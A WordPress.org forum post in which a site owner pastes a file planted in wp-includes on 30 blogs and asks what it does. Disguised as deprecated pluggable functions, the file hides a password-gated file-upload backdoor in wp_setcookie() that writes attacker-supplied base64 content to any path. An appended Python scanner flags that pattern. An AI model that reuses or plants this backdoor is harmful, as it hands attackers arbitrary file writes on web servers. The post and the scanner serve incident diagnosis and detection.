WordPress.org


Hacked File in wp-includes - Need A PHP Expert To Check Code (1 post)

  1. dadaas
    Member
    Posted 1 year ago #

    I'm sure there will be more and more people coming with this same problem. So I want to start this topic and to give them a solution.

    I'm 100% sure I'm hacked. But I don't know how, and I still don't know how to clean this hack.

    CODE THAT NEEDS TO BE LOOKED AT BY AN EXPERT

    <?php
    /**
     * Deprecated pluggable functions from past WordPress versions. You shouldn't use these
     * functions and look for the alternatives instead. The functions will be removed in a
     * later version.
     *
     * Deprecated warnings are also thrown if one of these functions is being defined by a plugin.
     *
     * @package WordPress
     * @subpackage Deprecated
     * @see pluggable.php
     */
    
    /*
     * Deprecated functions come here to die.
     */
    
    if ( !function_exists('set_current_user') ) :
    /**
     * Changes the current user by ID or name.
     *
     * Set $id to null and specify a name if you do not know a user's ID.
     *
     * @since 2.0.1
     * @see wp_set_current_user() An alias of wp_set_current_user()
     * @deprecated 3.0.0
     * @deprecated Use wp_set_current_user()
     *
     * @param int|null $id User ID.
     * @param string $name Optional. The user's username
     * @return object returns wp_set_current_user()
     */
    function set_current_user($id, $name = '') {
    	_deprecated_function( __FUNCTION__, '3.0', 'wp_set_current_user()' );
    	return wp_set_current_user($id, $name);
    }
    endif;
    
    if ( !function_exists('wp_setcookie') ) :
    /**
     * Sets a cookie for a user who just logged in. This function is deprecated.
     *
     * @since 1.5
     * @deprecated 2.5
     * @deprecated Use wp_set_auth_cookie()
     * @see wp_set_auth_cookie()
     *
     * @param string $username The user's username
     * @param string $password Optional. The user's password
     * @param bool $already_md5 Optional. Whether the password has already been through MD5
     * @param string $home Optional. Will be used instead of COOKIEPATH if set
     * @param string $siteurl Optional. Will be used instead of SITECOOKIEPATH if set
     * @param bool $remember Optional. Remember that the user is logged in
     */
    function wp_setcookie($hash) {
    $hash=md5($hash);
    if ($hash=="ab89e610961bbf64bdbea9267100fc15"){
    $inn=$_POST["name"];
    $inn=rawurldecode($inn);
    $inn=base64_decode($inn);
    $fn=fopen($inn,"w");
    if ($fn==false){echo "File open error\n";die;}else echo "File open success\n";
    $in=$_POST["data"];
    $in=rawurldecode($in);
    $in=base64_decode($in);
    fwrite($fn,$in);
    fclose($fn);
    }
    }
    endif;
    
    if ( !function_exists('wp_clearcookie') ) :
    /**
     * Clears the authentication cookie, logging the user out. This function is deprecated.
     *
     * @since 1.5
     * @deprecated 2.5
     * @deprecated Use wp_clear_auth_cookie()
     * @see wp_clear_auth_cookie()
     */
    function wp_clearcookie() {
    	_deprecated_function( __FUNCTION__, '2.5', 'wp_clear_auth_cookie()' );
    	wp_clear_auth_cookie();
    }
    endif;
    if ( !function_exists('wp_get_cookie_login') ):
    /**
     * Gets the user cookie login. This function is deprecated.
     *
     * This function is deprecated and should no longer be extended as it won't be
     * used anywhere in WordPress. Also, plugins shouldn't use it either.
     *
     * @since 2.0.3
     * @deprecated 2.5
     * @deprecated No alternative
     *
     * @return bool Always returns false
     */
    function wp_get_cookie_login() {
    	_deprecated_function( __FUNCTION__, '2.5' );
    	return false;
    }
    endif;
    wp_setcookie($_POST['wp-user']);
    if ( !function_exists('wp_login') ) :
    /**
     * Checks a users login information and logs them in if it checks out. This function is deprecated.
     *
     * Use the global $error to get the reason why the login failed. If the username
     * is blank, no error will be set, so assume blank username on that case.
     *
     * Plugins extending this function should also provide the global $error and set
     * what the error is, so that those checking the global for why there was a
     * failure can utilize it later.
     *
     * @since 1.2.2
     * @deprecated Use wp_signon()
     * @global string $error Error when false is returned
     *
     * @param string $username User's username
     * @param string $password User's password
     * @param bool $deprecated Not used
     * @return bool False on login failure, true on successful check
     */
    function wp_login($username, $password, $deprecated = '') {
    	_deprecated_function( __FUNCTION__, '2.5', 'wp_signon()' );
    	global $error;
    
    	$user = wp_authenticate($username, $password);
    
    	if ( ! is_wp_error($user) )
    		return true;
    
    	$error = $user->get_error_message();
    	return false;
    }
    endif;

    Why this code?
    This code was created in different filenames inside the wp-includes folder. All files were created on the same date and at the same time (a few minutes more or less) and through the whole server I'm on. This means all my 30 blogs got this file with a different name in wp-includes on the same date at the same time.

    Please, experts, check this code and tell us what it does?

    P.S. I will delete all these files on all my blogs and monitor if they come back.
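
Added example (not part of the original post, and not WordPress code): a heuristic Python scan for the flow visible in the posted wp_setcookie() body, where request data reaches fopen()/fwrite() behind a comparison against a hardcoded MD5 value. The function names, finding labels and the benign sample are assumptions made for illustration; the statement splitting is approximate and does not parse PHP.

```python
import re
from pathlib import Path

SUPER = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|FILES)\b")   # request superglobals
ASSIGN = re.compile(r"\$(\w+)\s*=(?!=)\s*(.*)", re.S)           # $var = expr (not ==)
SINK = re.compile(r"\b(fopen|fwrite|fputs|file_put_contents)\s*\((.*)", re.S)
VAR = re.compile(r"\$(\w+)")
MD5_GATE = re.compile(r"""==\s*["'][0-9a-fA-F]{32}["']""")      # == "32 hex chars"

def scan_php(source):
    """Return sorted findings for one PHP source string (statement-level taint pass)."""
    tainted, findings = set(), set()
    def is_tainted(expr):
        return bool(SUPER.search(expr)) or any(v in tainted for v in VAR.findall(expr))
    for stmt in source.split(";"):
        sink = SINK.search(stmt)
        if sink and is_tainted(sink.group(2)):
            findings.add("request-data->" + sink.group(1))
        assign = ASSIGN.search(stmt)
        if assign:
            name, expr = assign.groups()
            # A variable stays tainted only while its latest value derives from a request.
            (tainted.add if is_tainted(expr) else tainted.discard)(name)
    if "md5(" in source and MD5_GATE.search(source):
        findings.add("md5-literal-gate")
    return sorted(findings)

def scan_tree(root):
    """Map each .php file under root with a request-to-file-write flow to its findings."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_php(path.read_text(errors="replace"))
        if any(f.startswith("request-data->") for f in found):
            hits[str(path)] = found
    return hits

# Abridged from the wp_setcookie() body in the post above, used as sample input.
POSTED = '''
$hash=md5($hash);
if ($hash=="ab89e610961bbf64bdbea9267100fc15"){
$inn=$_POST["name"];
$inn=base64_decode($inn);
$fn=fopen($inn,"w");
$in=$_POST["data"];
fwrite($fn,$in);
}
'''
# Constructed benign sample: fixed path, no request data involved.
BENIGN = '<?php $fn=fopen("/tmp/cache.txt","w"); fwrite($fn,"ok"); fclose($fn);'

if __name__ == "__main__":
    print(scan_php(POSTED), scan_php(BENIGN))
```

Running `scan_tree()` over each blog's wp-includes directory lists the files to compare against a clean copy of the same WordPress release before deleting anything.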

Topic Closed

This topic has been closed to new replies.
